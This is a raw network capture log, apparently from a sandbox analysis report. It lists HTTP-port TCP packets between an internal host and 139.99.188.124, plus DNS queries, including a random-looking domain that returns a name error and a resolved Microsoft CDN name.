                                                                    Dec 18, 2024 09:19:25.085935116 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.087008953 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.087065935 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.087137938 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.088087082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.088141918 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.088201046 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.089195013 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.089279890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.089319944 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.213948011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.214044094 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.214091063 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.214554071 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.214601994 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.214665890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.215596914 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.215703011 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.215711117 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.216775894 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.216846943 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.216886997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.217856884 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.218009949 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.218087912 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.218959093 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.219130993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.219217062 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.220136881 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.220172882 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.220232964 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.221198082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.221304893 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.221335888 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.222332954 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.222439051 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.222546101 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.223464966 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.223572016 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.223623037 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.224567890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.224659920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.224752903 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.225676060 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.225811005 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.226105928 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.226855993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.226917982 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.226927042 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.227871895 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.228029013 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.237345934 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.237374067 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.237627983 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.237874031 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.237957954 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.238074064 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.238993883 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.239151001 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.239206076 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.240077972 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.240156889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.240689993 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.241260052 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.241429090 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.242306948 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.242357016 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.242377043 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.242965937 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.243402004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.243539095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.243808031 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.244570971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.244704008 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.244848967 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.245666981 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.245718956 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.245837927 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.246790886 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.246907949 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.247935057 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.248037100 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.248111963 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.248881102 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.249191046 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.249314070 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.249361038 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.250109911 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.250276089 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.250322104 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.251271009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.251307964 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.251360893 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.252357960 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.252501011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.252571106 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.253473043 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.253572941 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.254622936 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.254699945 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.254708052 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.254961014 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.255685091 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.255913973 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.256021976 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.256871939 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.257009983 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.257056952 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.257996082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.258042097 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.259083033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.259131908 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.259191990 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.260132074 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.260181904 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.260256052 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.260648012 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.261291027 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.261360884 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.261399984 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.262403965 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.262514114 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.263565063 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.263611078 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.263662100 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.263967991 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.264722109 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.264874935 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.265954971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.266007900 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.266051054 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.266340017 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.266860008 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.267021894 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.267061949 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.267967939 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.268079042 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.268125057 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.269104958 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.269201994 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.269241095 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.270215988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.270318031 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.270358086 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.271348000 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.271418095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.271697998 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.272527933 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.272677898 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.272789955 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.273735046 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.273782015 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.274523020 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.274694920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.274827957 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.275882959 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.275938988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.275974035 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.275974035 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.276910067 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.277034044 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.277089119 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.278217077 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.278373957 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.278911114 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.279463053 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.279617071 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.280803919 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.280834913 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.280877113 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.280877113 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.405149937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.405230999 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.405306101 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.405545950 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.405658960 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.644164085 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.644438982 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.644774914 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.644877911 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.644999027 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.645869970 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.645966053 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.646055937 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.647026062 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.647038937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.647095919 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.648077011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.648087978 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.648135900 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.649161100 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.649291992 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.649386883 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.650312901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.650401115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.650500059 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.651444912 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.651518106 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.651603937 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.652518034 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.652595997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.652692080 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.653654099 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.653747082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.653886080 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.654763937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.654860020 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.654969931 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.655875921 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.655973911 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.656153917 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.657001972 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.657114029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.657232046 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.658179045 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.658278942 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.658425093 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.659241915 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.659358025 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.659456015 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.660393000 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.660475969 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.660643101 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.661461115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.661562920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.661655903 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.662581921 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.662651062 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.662708044 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.787514925 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.787528038 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.787698030 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.788048029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.788157940 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.788362980 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.789171934 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.789283991 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.789578915 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.790299892 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.790395975 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.790565014 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.791410923 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.791472912 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.791877031 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.792592049 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.792666912 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.793328047 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.793617964 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.793725014 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.794389963 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.794750929 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.794878006 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.795239925 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.795881033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.796019077 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.796317101 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.796974897 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.797091007 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.798185110 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.798268080 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.798446894 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.798446894 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.799201965 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.799346924 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.799506903 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.800358057 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.800450087 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.800915003 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.801440954 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.810769081 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.810858011 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.810869932 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.811238050 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.811357975 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.811398983 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.812386990 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.812464952 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.812522888 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.813396931 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.813493967 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.813528061 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.814524889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.814569950 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.814660072 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.815628052 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.815679073 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.815753937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.816843987 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.816855907 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.816915989 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.817876101 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.817976952 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.817981958 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.818980932 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.819032907 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.819075108 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.820077896 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.820200920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.820235968 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.821206093 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.821285009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.821350098 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.822257042 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.822463989 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:26.106916904 CET4973880192.168.2.6139.99.188.124
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 09:19:28.926529884 CET | 50034 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 09:19:29.064598083 CET | 53 | 50034 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 09:19:46.940355062 CET | 51214 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 09:19:47.083857059 CET | 53 | 51214 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 09:19:28.926529884 CET | 192.168.2.6 | 1.1.1.1 | 0x6bf | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:19:46.940355062 CET | 192.168.2.6 | 1.1.1.1 | 0xa5be | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 09:19:29.064598083 CET | 1.1.1.1 | 192.168.2.6 | 0x6bf | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:19:47.083857059 CET | 1.1.1.1 | 192.168.2.6 | 0xa5be | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:20:00.596944094 CET | 1.1.1.1 | 192.168.2.6 | 0xe48e | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 09:20:00.596944094 CET | 1.1.1.1 | 192.168.2.6 | 0xe48e | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.100 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:20:00.596944094 CET | 1.1.1.1 | 192.168.2.6 | 0xe48e | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.101 | A (IP address) | IN (0x0001) | false
